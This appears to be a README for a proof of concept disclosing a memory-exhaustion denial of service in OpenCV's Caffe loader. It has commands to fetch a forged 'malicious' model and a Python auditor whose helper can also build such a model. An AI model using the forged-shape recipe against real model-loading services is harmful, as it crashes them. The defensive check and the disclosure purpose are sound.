Caffe blob-shape allocation DoS PoC

This repository contains a benign security research PoC: a Caffe model file whose forged BlobProto.shape makes cv2.dnn.readNetFromCaffe(...) size a blob allocation from the declared shape, so that loading the model fails with an allocation error once the process is memory-capped.

Files:

  • tiny_fc.prototxt (network definition used with both models)
  • control_fc_blob_shape_2x2.caffemodel (control: honest 2x2 blob shape)
  • malicious_fc_blob_shape_100m_x2.caffemodel (forged 100,000,000 x 2 blob shape)
  • reproduce.py (loads both models against the prototxt and reports the outcome)
  • requirements.txt

Tested environment:

  • opencv-python==4.13.0.92
  • runtime cv2.__version__ == 4.13.0

Observed behavior:

  • control model:
    • loads successfully
  • malicious model:
    • with the process address-space cap tightened to 800 MiB (838,860,800 bytes)
    • readNetFromCaffe raises: Failed to allocate 800000000 bytes
    • the requested size matches the forged shape: 100,000,000 x 2 float32 elements x 4 bytes = 800,000,000 bytes

Reproduction:

python3 -m venv /tmp/caffe-blob-shape-dos
/tmp/caffe-blob-shape-dos/bin/pip install -U pip
/tmp/caffe-blob-shape-dos/bin/pip install -r requirements.txt

curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/tiny_fc.prototxt
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/control_fc_blob_shape_2x2.caffemodel
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/malicious_fc_blob_shape_100m_x2.caffemodel
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/reproduce.py
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/requirements.txt

/tmp/caffe-blob-shape-dos/bin/python reproduce.py --prototxt tiny_fc.prototxt --control control_fc_blob_shape_2x2.caffemodel --malicious malicious_fc_blob_shape_100m_x2.caffemodel
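The check a consumer of untrusted .caffemodel files would want before calling readNetFromCaffe, as an added example that is not part of this repository and not reproduce.py: it walks the protobuf wire format directly (no caffe_pb2 needed), compares each blob's declared shape against the float data the file actually stores, and refuses any blob whose float32 allocation would exceed a budget. The two models it builds are constructed in-memory stand-ins for the control and malicious files (layer name "fc" and type "InnerProduct" are assumed); the field numbers are taken from caffe.proto.

```python
import math
import struct

# Field numbers from caffe.proto: NetParameter.layer = 100, LayerParameter.name = 1,
# LayerParameter.type = 2, LayerParameter.blobs = 7, BlobProto.shape = 7,
# BlobProto.data = 5, BlobProto.double_data = 8, BlobShape.dim = 1,
# legacy BlobProto num/channels/height/width = 1..4.
NET_LAYER, LAYER_NAME, LAYER_TYPE, LAYER_BLOBS = 100, 1, 2, 7
BLOB_SHAPE, BLOB_DATA, BLOB_DOUBLE_DATA, SHAPE_DIM = 7, 5, 8, 1
BLOB_LEGACY_DIMS = (1, 2, 3, 4)


def _varint(n: int) -> bytes:
    out = bytearray()
    while True:
        byte, n = n & 0x7F, n >> 7
        out.append((byte | 0x80) if n else byte)
        if not n:
            return bytes(out)


def _ld(field: int, payload: bytes) -> bytes:
    """Encode one length-delimited (wire type 2) field."""
    return _varint((field << 3) | 2) + _varint(len(payload)) + payload


def build_caffemodel(shape, values) -> bytes:
    """Constructed NetParameter with one layer 'fc' of type 'InnerProduct' (assumed
    names) whose single blob declares `shape` but stores only `values` as float32."""
    blob = _ld(BLOB_SHAPE, _ld(SHAPE_DIM, b"".join(_varint(d) for d in shape)))
    blob += _ld(BLOB_DATA, struct.pack("<%df" % len(values), *values))
    layer = _ld(LAYER_NAME, b"fc") + _ld(LAYER_TYPE, b"InnerProduct") + _ld(LAYER_BLOBS, blob)
    return _ld(NET_LAYER, layer)


def _read_varint(buf: bytes, pos: int):
    result, shift = 0, 0
    while True:
        if pos >= len(buf) or shift > 63:
            raise ValueError("truncated or oversized varint")
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7


def _fields(buf: bytes):
    """Yield (field_number, wire_type, value) for every field of one message."""
    pos = 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        num, wt = tag >> 3, tag & 7
        if wt == 0:
            val, pos = _read_varint(buf, pos)
        elif wt == 2:
            length, pos = _read_varint(buf, pos)
            val, pos = buf[pos:pos + length], pos + length
            if len(val) != length:
                raise ValueError("truncated length-delimited field")
        elif wt in (1, 5):
            size = 8 if wt == 1 else 4
            val, pos = buf[pos:pos + size], pos + size
        else:
            raise ValueError("unsupported wire type %d" % wt)
        yield num, wt, val


def _blob_dims(blob: bytes) -> list:
    """Dims from BlobProto.shape (packed or unpacked), else the legacy 4-D fields."""
    dims, legacy = [], {}
    for num, wt, val in _fields(blob):
        if num == BLOB_SHAPE and wt == 2:
            for snum, swt, sval in _fields(val):
                if snum == SHAPE_DIM and swt == 2:
                    p = 0
                    while p < len(sval):
                        d, p = _read_varint(sval, p)
                        dims.append(d)
                elif snum == SHAPE_DIM and swt == 0:
                    dims.append(sval)
        elif num in BLOB_LEGACY_DIMS and wt == 0:
            legacy[num] = val
    if not dims and legacy:
        dims = [legacy.get(i, 0) for i in BLOB_LEGACY_DIMS]
    return dims


def _stored_elems(blob: bytes) -> int:
    n = 0
    for num, wt, val in _fields(blob):
        if num == BLOB_DATA:
            n += len(val) // 4 if wt == 2 else 1
        elif num == BLOB_DOUBLE_DATA:
            n += len(val) // 8 if wt == 2 else 1
    return n


def audit_caffemodel(raw: bytes, max_blob_bytes: int = 256 * 2**20) -> list:
    """One finding per blob: the float32 allocation the declared shape implies,
    versus the elements actually stored, and whether the blob is acceptable."""
    findings = []
    for num, wt, layer in _fields(raw):
        if num != NET_LAYER or wt != 2:
            continue
        name, blobs = "<unnamed>", []
        for lnum, lwt, lval in _fields(layer):
            if lnum == LAYER_NAME and lwt == 2:
                name = lval.decode("utf-8", "replace")
            elif lnum == LAYER_BLOBS and lwt == 2:
                blobs.append(lval)
        for blob in blobs:
            dims = _blob_dims(blob)
            declared = math.prod(dims)  # empty shape is a scalar (1 element)
            stored = _stored_elems(blob)
            required = declared * 4
            reasons = []
            if required > max_blob_bytes:
                reasons.append("shape needs %d bytes, budget is %d" % (required, max_blob_bytes))
            if declared != stored:
                reasons.append("shape declares %d elements, file stores %d" % (declared, stored))
            findings.append({"layer": name, "dims": dims, "declared_elems": declared,
                             "stored_elems": stored, "required_bytes": required,
                             "ok": not reasons, "reasons": reasons})
    return findings


def is_safe_to_load(raw: bytes, max_blob_bytes: int = 256 * 2**20) -> bool:
    """Gate to run before cv2.dnn.readNetFromCaffe on untrusted weights."""
    return all(f["ok"] for f in audit_caffemodel(raw, max_blob_bytes))


if __name__ == "__main__":
    control = build_caffemodel([2, 2], [0.1, 0.2, 0.3, 0.4])
    malicious = build_caffemodel([100_000_000, 2], [0.1, 0.2, 0.3, 0.4])
    for label, model in (("control", control), ("malicious", malicious)):
        for finding in audit_caffemodel(model):
            print(label, finding)
```

With the default 256 MiB budget the forged blob is rejected on both counts; with a budget equal to the 800 MiB cap used above it is still rejected, because four stored floats cannot back 200,000,000 declared elements. That shape-versus-data comparison is the more robust of the two checks, since it does not depend on choosing a budget.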

Repo state at verification time:

  • private=false, commit 08c3638412a27a477567976ab976c01b2716cf45